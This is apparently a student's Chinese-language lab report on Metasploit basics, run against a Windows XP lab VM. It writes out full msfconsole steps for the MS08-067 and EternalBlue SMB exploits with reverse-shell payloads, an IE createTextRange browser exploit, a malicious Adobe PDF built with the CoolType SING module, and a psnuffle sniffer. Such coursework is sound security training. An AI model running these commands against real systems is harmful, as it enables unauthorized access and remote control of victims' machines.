首页 > 其他分享 >Exp6 MSF应用基础

Exp6 MSF应用基础

时间:2023-05-04 22:55:52浏览次数:50  
标签:set 攻击 Exp6 漏洞 exploit 应用 MSF 靶机 payload

目录

一、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1 一个主动攻击实践,尽量使用最新的类似漏洞; (1分)

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)

1.4 成功应用任何一个辅助模块。(1分)

二、实践过程

(一)创建靶机

将windows XP作为靶机

按https://blog.csdn.net/linxinfa/article/details/112768896创建好靶机后,配置共享文件夹

xp系统打开cmd,再输入ipconfig指令查看其IP。

xp:192.168.136.132
kali:192.168.136.129

查看两台主机网络是否互通,互ping发现网络是互通的。

(二)一个主动攻击实践

1. 利用ms08_067漏洞攻击Windows XP

攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.136.132

存在漏洞信息。

启动 msfconsole,输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi

输入info exploit/windows/smb/ms08_067_netapi查看模块具体的信息。

use exploit/windows/smb/ms08_067_netapi		//选择使用的渗透模块

set payload generic/shell_reverse_tcp	  //使用的payload

set RHOSTS 192.168.136.132 //设置靶机IP

exploit

结果是能够发现靶机的型号,但无法建立连接。显示渗透已完成,但没有建立会话。

2.利用ms17_010_eternalblue漏洞攻击Windows

选择auxiliary的scanner扫描功能,检测靶机是否存在smb_ms17_010的漏洞。

发现

对靶机进行攻击

use exploit/windows/smb/ms17_010_eternalblue 

set payload windows/x64/meterpreter/reverse_tcp

set RHOSTS 192.168.136.132 靶机IP //设置靶机IP

exploit 

获得shell,输入ipconfigdir 成功运行

(三)一个针对浏览器的攻击

1.利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器

(1)设计攻击模块及参数
use exploit/windows/browser/ms06_013_createtextrange //选择使用exploit漏洞
set payload windows/meterpreter/reverse_tcp  //选择payload
show options //查看所需调的参数
exploit   //开始攻击

在XP的IE浏览器打开http://192.168.136.129:8080/krNzcum浏览器开始从0-100计时。

(四)一个针对客户端的攻击

1.Adobe

msfconsole          //进入控制台
search adobe        //搜索与adobe有关的漏洞
use windows/fileformat/adobe_cooltype_sing  //选择使用此漏洞set payload windows/meterpreter/bind_tcp    //选择攻击载荷
show options        //查看需要配置的参数选项set LPORT 1315    //设置端口号set RHOST 192.168.136.132   //设置靶机IP地址set FILENAME lzq.pdf  //设置生成的PDF文件名
exploit             //生成.pdf文件

将生成的PDF文件复制到XP虚拟机中

在kali中开启监听

use exploit/multi/handler     //进入监听模块
set payload windows/meterpreter/bind_tcp   //选择攻击载荷
show options        //查看需要配置的参数选项
set LPORT 1315      //设置端口号
set RHOST 192.168.136.132   //设置靶机IP地址
exploit             //开启监听

在靶机中使用Adobe Reader打开pdf

攻击成功

(五)成功应用一个辅助模块

1.sniffer嗅探

在kali的msfconsole中输入以下代码

嗅探:可以获取网络上流经的数据包。

use auxiliary/sniffer/psnuffle //选择攻击操作
show options
exploit

在靶机上访问IE浏览器,即被嗅探到。

三、遇到的问题

创建共享文件夹时找不到选择的文件夹

重新安装VMware Tools解决

四、实践问题回答

用自己的话解释什么 是exploit,payload,encode。

简单地说,exploit是利用系统或软件中的漏洞的一段代码或技术。它通常用于获得对系统的未经授权的访问或控制。

payload是攻击中实际执行所需操作的部分,例如执行命令或下载文件。它本质上是交付给目标系统的“有效载荷”。

encode是指将数据转换为特定格式或表示的过程。在利用和有效负载的上下文中,编码通常用于混淆有效负载,使其更难以检测或分析。这可以使用各种编码技术来实现,比如base64编码。

总之,exploit是利用漏洞的方法,payload是执行所需操作的实际代码,encode是用于混淆有效负载的技术。

五、离实践还缺什么技术或步骤

经过这次实践,将病毒和后门程序真正展现起作用才是最重要的,我们需要利用社会工程学,引诱被攻击用户在靶机上打开对应的文件或链接。搜集靶机的漏洞信息至关重要,只有搜集到了其主机存在的漏洞才能进行下一步的攻击。除此之外,自己还需要加强解决问题和随机应变分析问题的能力,做到心中有数。

六、实践心得体会

在本次实验前,我们已经使用过多次msf,但这是第一次系统地学习使用方法。通过本次实验,进一步了解了msf平台能够实现的恶意攻击行为,了解了多个模块对应实现的功能,对exploit和payload有了更进一步的理解。我逐渐学会了展开攻击的一个具体思路,在以后的实践中还要多加练习。

标签:set,攻击,Exp6,漏洞,exploit,应用,MSF,靶机,payload
From: https://www.cnblogs.com/moonyecho/p/17372791.html

相关文章

  • 网络对抗实验六 MSF应用基础--20201313
    《网络对抗技术》——Exp6MSF应用基础目录《网络对抗技术》——Exp6MSF应用基础一、实践内容二、问题回答三、实践过程实验准备:1、一个主动攻击实践ms08_067_netapi2、一个针对浏览器的攻击ms10_018_ie_behaviors3、一个针对客户端的攻击Wireshark4、成功应用一个辅助模块sniff......
  • Exp6 MSF应用基础
    目录一.实验信息二.实验内容三.实验知识四.实验过程4.1一个主动攻击实践(ms17_010)4.2一个针对浏览器的攻击(ms10_018)4.3一个针对客户端的攻击4.4成功应用任何一个辅助模块(scannerport)五.基础问题回答六.实验总结体会一.实验信息课程名称:网络对抗技术实验序号:6实验名称:MSF......
  • 《网络对抗技术》——Exp6 MSF应用基础
    目录一、实践内容二、实践原理三、实践过程1、一个主动攻击实践4.2针对浏览器的攻击3、一个针对客户端的攻击4、成功应用一个辅助模块四、实践问题回答五、离实践还缺什么技术或步骤六、实践心得体会一、实践内容本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻......
  • 网络对抗实验六 MSF应用基础
    Exp6MSF应用基础实验目标1.1一个主动攻击实践,尽量使用最新的类似漏洞;(1分)1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)1.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)1.4成功应用任何一个辅助模块。(1分)实验内容0实验准备0.1实验原理0.1.......
  • 20201306 Exp6 MSF应用基础
    一、实践内容二、实践原理三、实践过程1、一个主动攻击实践ms08_067_netapims17_0102、一个针对浏览器的攻击ms14_064ms17-0103、一个针对客户端的攻击AdobeWireshark4、成功应用一个辅助模块sniffer嗅探portscan端口扫描MSF使用nmap四、实践问题回答五、离实践......
  • transformers在ctr中的应用
    文章目录1.背景2.相关论文解析2.1《AutoInt:AutomaticFeatureInteractionLearningviaSelf-AttentiveNeuralNetworks》2.1.1论文贡献2.1.2模型结构2.1.2.1输入2.1.2.2注意力机制层2.1.3实验结果2.2《BehaviorSequenceTransformerforE-commerceRecommendationin......
  • SQL 通用表达式递归查询的应用举例
    前置知识对于大多数人来说,SQL意味着SELECT、INSERT、UPDATE和DELETE。但实际上,SQL能够实现的功能远远不止简单的增删改查;今天我们来介绍一个高级功能:通用表表达式(CommonTableExpression)。CTE可以提高复杂查询的性能和可读性,实现树状结构或者图数据的遍历。例如:生成数字......
  • Exp6 MSF应用基础
    一、实验原理(1)MSF简介Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。(2)程序特点这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使MetasploitFramewo......
  • 6.4.3(3) 余弦定理、正弦定理的应用
    \({\color{Red}{欢迎到学科网下载资料学习}}\)[【基础过关系列】高一数学同步精品讲义与分层练习(人教A版2019)](https://www.zxxk.com/docpack/2921718.html)\({\color{Red}{跟贵哥学数学,so\quadeasy!}}\)必修第二册同步巩固,难度2颗星!基础知识解三角形一般地,三角形的......
  • Exp6 MSF应用基础 20202211王宏韬
    目录1基础问题回答2实验总结与体会3离实践缺少什么4实践过程记录主动攻击实践针对浏览器攻击针对adobe客户端攻击应用辅助模块tcp端口扫描   1基础问题回答 exploit:利用发现的安全漏洞或配置弱点对靶机进行攻击,将payload发送给靶机。payload:植入靶机......